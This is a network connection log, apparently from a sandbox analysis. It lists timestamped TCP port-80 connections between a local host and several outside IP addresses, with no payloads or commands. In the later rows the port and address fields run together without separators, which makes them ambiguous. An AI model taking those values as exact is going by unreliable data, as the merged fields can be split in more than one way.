Dec 13, 2024 13:07:08.252688885 CET | 49738 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:08.544068098 CET | 49738 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:09.563119888 CET | 49740 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:09.682861090 CET | 80 | 49740 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:09.683038950 CET | 49740 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:09.695612907 CET | 49740 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:09.815541029 CET | 80 | 49740 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:09.815547943 CET | 80 | 49740 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:09.815576077 CET | 80 | 49740 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:09.815581083 CET | 80 | 49740 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:09.815665960 CET | 80 | 49740 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:09.815675974 CET | 80 | 49740 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:09.815748930 CET | 80 | 49740 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:09.815757990 CET | 80 | 49740 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:09.815764904 CET | 80 | 49740 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:10.908570051 CET | 80 | 49740 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:10.908677101 CET | 80 | 49740 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:10.908823967 CET | 49740 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:10.909189939 CET | 80 | 49740 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:10.909292936 CET | 49740 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:11.200356960 CET | 49740 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:12.219161987 CET | 49747 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:12.338851929 CET | 80 | 49747 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:12.338927031 CET | 49747 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:12.347208023 CET | 49747 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:12.466928005 CET | 80 | 49747 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:13.579396009 CET | 80 | 49747 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:13.579413891 CET | 80 | 49747 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:13.579638004 CET | 49747 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:13.580708027 CET | 80 | 49747 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:13.580764055 CET | 49747 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:13.582698107 CET | 49747 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:13.702440023 CET | 80 | 49747 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:19.100761890 CET | 49768 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:19.221019030 CET | 80 | 49768 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:19.222850084 CET | 49768 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:19.234565973 CET | 49768 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:19.354324102 CET | 80 | 49768 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:20.468278885 CET | 80 | 49768 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:20.468355894 CET | 80 | 49768 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:20.468417883 CET | 49768 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:20.468424082 CET | 80 | 49768 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:20.468482018 CET | 49768 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:20.746993065 CET | 49768 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:21.768246889 CET | 49774 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:21.888194084 CET | 80 | 49774 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:21.888308048 CET | 49774 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:21.900254965 CET | 49774 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:22.020000935 CET | 80 | 49774 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:23.137814999 CET | 80 | 49774 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:23.137918949 CET | 80 | 49774 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:23.137938023 CET | 80 | 49774 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:23.138022900 CET | 49774 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:23.403548956 CET | 49774 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:24.423098087 CET | 49780 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:24.646851063 CET | 80 | 49780 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:24.647047997 CET | 49780 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:24.659626007 CET | 49780 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:24.884551048 CET | 80 | 49780 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:24.884574890 CET | 80 | 49780 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:24.884588003 CET | 80 | 49780 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:24.884599924 CET | 80 | 49780 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:24.884604931 CET | 80 | 49780 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:24.884609938 CET | 80 | 49780 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:24.884615898 CET | 80 | 49780 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:24.884620905 CET | 80 | 49780 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:24.884625912 CET | 80 | 49780 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:25.936115980 CET | 80 | 49780 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:25.936146975 CET | 80 | 49780 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:25.936188936 CET | 80 | 49780 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:25.936214924 CET | 49780 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:25.936270952 CET | 49780 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:26.169090986 CET | 49780 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:27.187920094 CET | 49786 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:27.307616949 CET | 80 | 49786 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:27.307753086 CET | 49786 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:27.315848112 CET | 49786 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:27.435621977 CET | 80 | 49786 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:28.567853928 CET | 80 | 49786 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:28.567878962 CET | 80 | 49786 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:28.567894936 CET | 80 | 49786 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:28.567909002 CET | 80 | 49786 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:28.568123102 CET | 49786 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:28.568177938 CET | 49786 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:28.572967052 CET | 49786 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:07:28.692686081 CET | 80 | 49786 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:07:33.977802992 CET | 49802 | 80 | 192.168.2.4 | 209.74.64.58
Dec 13, 2024 13:07:34.097605944 CET | 80 | 49802 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:34.097698927 CET | 49802 | 80 | 192.168.2.4 | 209.74.64.58
Dec 13, 2024 13:07:34.109224081 CET | 49802 | 80 | 192.168.2.4 | 209.74.64.58
Dec 13, 2024 13:07:34.229104042 CET | 80 | 49802 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:35.326441050 CET | 80 | 49802 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:35.326520920 CET | 80 | 49802 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:35.326586962 CET | 49802 | 80 | 192.168.2.4 | 209.74.64.58
Dec 13, 2024 13:07:35.622216940 CET | 49802 | 80 | 192.168.2.4 | 209.74.64.58
Dec 13, 2024 13:07:36.641191959 CET | 49813 | 80 | 192.168.2.4 | 209.74.64.58
Dec 13, 2024 13:07:36.760864973 CET | 80 | 49813 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:36.760987997 CET | 49813 | 80 | 192.168.2.4 | 209.74.64.58
Dec 13, 2024 13:07:36.772923946 CET | 49813 | 80 | 192.168.2.4 | 209.74.64.58
Dec 13, 2024 13:07:36.892709017 CET | 80 | 49813 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:38.014288902 CET | 80 | 49813 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:38.014915943 CET | 80 | 49813 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:38.014966965 CET | 49813 | 80 | 192.168.2.4 | 209.74.64.58
Dec 13, 2024 13:07:38.278389931 CET | 49813 | 80 | 192.168.2.4 | 209.74.64.58
Dec 13, 2024 13:07:39.301182985 CET | 49819 | 80 | 192.168.2.4 | 209.74.64.58
Dec 13, 2024 13:07:39.421000957 CET | 80 | 49819 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:39.421114922 CET | 49819 | 80 | 192.168.2.4 | 209.74.64.58
Dec 13, 2024 13:07:39.433037996 CET | 49819 | 80 | 192.168.2.4 | 209.74.64.58
Dec 13, 2024 13:07:39.552916050 CET | 80 | 49819 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:39.552922010 CET | 80 | 49819 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:39.552946091 CET | 80 | 49819 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:39.552957058 CET | 80 | 49819 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:39.553045988 CET | 80 | 49819 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:39.553050041 CET | 80 | 49819 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:39.553105116 CET | 80 | 49819 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:39.553174019 CET | 80 | 49819 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:39.553178072 CET | 80 | 49819 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:40.717149973 CET | 80 | 49819 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:40.717164993 CET | 80 | 49819 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:40.722908974 CET | 49819 | 80 | 192.168.2.4 | 209.74.64.58
Dec 13, 2024 13:07:40.934554100 CET | 49819 | 80 | 192.168.2.4 | 209.74.64.58
Dec 13, 2024 13:07:41.954359055 CET | 49825 | 80 | 192.168.2.4 | 209.74.64.58
Dec 13, 2024 13:07:42.074193001 CET | 80 | 49825 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:42.074282885 CET | 49825 | 80 | 192.168.2.4 | 209.74.64.58
Dec 13, 2024 13:07:42.084146023 CET | 49825 | 80 | 192.168.2.4 | 209.74.64.58
Dec 13, 2024 13:07:42.203859091 CET | 80 | 49825 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:43.304805994 CET | 80 | 49825 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:43.304907084 CET | 80 | 49825 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:43.305089951 CET | 49825 | 80 | 192.168.2.4 | 209.74.64.58
Dec 13, 2024 13:07:43.328356981 CET | 49825 | 80 | 192.168.2.4 | 209.74.64.58
Dec 13, 2024 13:07:43.448426008 CET | 80 | 49825 | 209.74.64.58 | 192.168.2.4
Dec 13, 2024 13:07:46.270190954 CET | 49836 | 80 | 192.168.2.4 | 45.200.148.45
Dec 13, 2024 13:07:46.390041113 CET | 80 | 49836 | 45.200.148.45 | 192.168.2.4
Dec 13, 2024 13:07:46.390131950 CET | 49836 | 80 | 192.168.2.4 | 45.200.148.45
Dec 13, 2024 13:07:46.392812014 CET | 49836 | 80 | 192.168.2.4 | 45.200.148.45
Dec 13, 2024 13:07:46.513077021 CET | 80 | 49836 | 45.200.148.45 | 192.168.2.4
Dec 13, 2024 13:08:08.290463924 CET | 80 | 49836 | 45.200.148.45 | 192.168.2.4
Dec 13, 2024 13:08:08.290667057 CET | 49836 | 80 | 192.168.2.4 | 45.200.148.45
Dec 13, 2024 13:08:08.290667057 CET | 49836 | 80 | 192.168.2.4 | 45.200.148.45
Dec 13, 2024 13:08:08.295896053 CET | 49886 | 80 | 192.168.2.4 | 45.200.148.45
Dec 13, 2024 13:08:08.410474062 CET | 80 | 49836 | 45.200.148.45 | 192.168.2.4
Dec 13, 2024 13:08:08.415663958 CET | 80 | 49886 | 45.200.148.45 | 192.168.2.4
Dec 13, 2024 13:08:08.415755987 CET | 49886 | 80 | 192.168.2.4 | 45.200.148.45
Dec 13, 2024 13:08:08.416538000 CET | 49886 | 80 | 192.168.2.4 | 45.200.148.45
Dec 13, 2024 13:08:08.536248922 CET | 80 | 49886 | 45.200.148.45 | 192.168.2.4
Dec 13, 2024 13:08:30.306541920 CET | 80 | 49886 | 45.200.148.45 | 192.168.2.4
Dec 13, 2024 13:08:30.307106972 CET | 49886 | 80 | 192.168.2.4 | 45.200.148.45
Dec 13, 2024 13:08:30.307647943 CET | 49886 | 80 | 192.168.2.4 | 45.200.148.45
Dec 13, 2024 13:08:30.427308083 CET | 80 | 49886 | 45.200.148.45 | 192.168.2.4
Dec 13, 2024 13:08:33.807017088 CET | 49946 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:33.926956892 CET | 80 | 49946 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:33.927067041 CET | 49946 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:33.940336943 CET | 49946 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:34.060211897 CET | 80 | 49946 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:35.450355053 CET | 49946 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:35.570650101 CET | 80 | 49946 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:35.570736885 CET | 49946 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:36.469892979 CET | 49953 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:36.589803934 CET | 80 | 49953 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:36.593096018 CET | 49953 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:36.613003969 CET | 49953 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:36.732973099 CET | 80 | 49953 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:38.122267008 CET | 49953 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:38.242397070 CET | 80 | 49953 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:38.242454052 CET | 49953 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:39.141294003 CET | 49959 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:39.261976957 CET | 80 | 49959 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:39.262254953 CET | 49959 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:39.273969889 CET | 49959 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:39.394314051 CET | 80 | 49959 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:39.394362926 CET | 80 | 49959 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:39.394392014 CET | 80 | 49959 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:39.394419909 CET | 80 | 49959 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:39.394474983 CET | 80 | 49959 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:39.394504070 CET | 80 | 49959 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:39.394531965 CET | 80 | 49959 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:39.394560099 CET | 80 | 49959 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:39.394587994 CET | 80 | 49959 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:40.780985117 CET | 49959 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:40.901333094 CET | 80 | 49959 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:40.901432037 CET | 49959 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:41.798677921 CET | 49965 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:41.918896914 CET | 80 | 49965 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:41.919002056 CET | 49965 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:41.928286076 CET | 49965 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:42.048085928 CET | 80 | 49965 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:43.766669035 CET | 80 | 49965 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:43.766716003 CET | 80 | 49965 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:43.766822100 CET | 49965 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:43.766932964 CET | 80 | 49965 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:43.766978025 CET | 49965 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:43.770152092 CET | 49965 | 80 | 192.168.2.4 | 104.21.74.79
Dec 13, 2024 13:08:43.890049934 CET | 80 | 49965 | 104.21.74.79 | 192.168.2.4
Dec 13, 2024 13:08:49.480741024 CET | 49984 | 80 | 192.168.2.4 | 3.33.130.190
Dec 13, 2024 13:08:49.602226019 CET | 80 | 49984 | 3.33.130.190 | 192.168.2.4
Dec 13, 2024 13:08:49.602308035 CET | 49984 | 80 | 192.168.2.4 | 3.33.130.190
Dec 13, 2024 13:08:49.617727041 CET | 49984 | 80 | 192.168.2.4 | 3.33.130.190
Dec 13, 2024 13:08:49.737728119 CET | 80 | 49984 | 3.33.130.190 | 192.168.2.4
                                                                        Dec 13, 2024 13:08:50.697571993 CET80499843.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:50.697627068 CET80499843.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:50.698087931 CET4998480192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:51.122313976 CET4998480192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:52.142452955 CET4999280192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:52.262357950 CET80499923.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:52.262449980 CET4999280192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:52.276360035 CET4999280192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:52.396222115 CET80499923.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:53.357635021 CET80499923.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:53.357688904 CET80499923.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:53.357819080 CET4999280192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:53.778810024 CET4999280192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:54.799082994 CET4999880192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:54.919367075 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:54.919531107 CET4999880192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:54.931969881 CET4999880192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:55.052100897 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:55.052120924 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:55.052140951 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:55.052149057 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:55.052189112 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:55.052242041 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:55.052333117 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:55.052342892 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:55.052386045 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:56.035886049 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:56.049541950 CET80499983.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:56.049619913 CET4999880192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:56.435236931 CET4999880192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:57.455065012 CET5000480192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:57.574899912 CET80500043.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:57.574971914 CET5000480192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:57.590099096 CET5000480192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:57.710022926 CET80500043.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:58.686669111 CET80500043.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:58.686806917 CET80500043.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:08:58.687150002 CET5000480192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:58.691472054 CET5000480192.168.2.43.33.130.190
                                                                        Dec 13, 2024 13:08:58.811412096 CET80500043.33.130.190192.168.2.4
                                                                        Dec 13, 2024 13:09:04.079346895 CET5002080192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:04.200648069 CET805002013.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:04.200783014 CET5002080192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:04.211534023 CET5002080192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:04.331571102 CET805002013.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:05.300121069 CET805002013.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:05.300241947 CET805002013.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:05.300297022 CET5002080192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:05.716128111 CET5002080192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:06.735759974 CET5002780192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:06.855570078 CET805002713.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:06.855638027 CET5002780192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:06.868469000 CET5002780192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:06.988708973 CET805002713.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:08.375339031 CET5002780192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:08.539804935 CET805002713.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:09.392297029 CET5002880192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:09.512403965 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:09.512507915 CET5002880192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:09.526329994 CET5002880192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:09.646409988 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:09.646472931 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:09.646528959 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:09.646557093 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:09.646584034 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:09.646610975 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:09.646661997 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:09.646688938 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:09.646714926 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:10.768997908 CET805002713.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:10.769076109 CET5002780192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:11.032301903 CET5002880192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:11.195777893 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:12.048088074 CET5002980192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:12.168354988 CET805002913.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:12.168482065 CET5002980192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:12.176275015 CET5002980192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:12.296336889 CET805002913.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:13.432576895 CET805002813.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:13.432646036 CET5002880192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:16.285753965 CET805002913.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:16.285855055 CET805002913.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:16.285959959 CET5002980192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:16.288891077 CET5002980192.168.2.413.248.169.48
                                                                        Dec 13, 2024 13:09:16.411011934 CET805002913.248.169.48192.168.2.4
                                                                        Dec 13, 2024 13:09:22.141057014 CET5003080192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:22.260935068 CET8050030144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:22.261080027 CET5003080192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:22.270004034 CET5003080192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:22.391149998 CET8050030144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:23.555135012 CET8050030144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:23.555160999 CET8050030144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:23.555205107 CET5003080192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:23.781130075 CET5003080192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:24.798434973 CET5003180192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:24.919121027 CET8050031144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:24.919234037 CET5003180192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:24.934504986 CET5003180192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:25.054527044 CET8050031144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:26.190865040 CET8050031144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:26.190988064 CET8050031144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:26.191109896 CET5003180192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:26.450566053 CET5003180192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:27.469944000 CET5003280192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:27.593302965 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:27.593620062 CET5003280192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:27.605433941 CET5003280192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:27.841203928 CET5003280192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:28.187427998 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:28.187480927 CET8050032144.76.190.39192.168.2.4
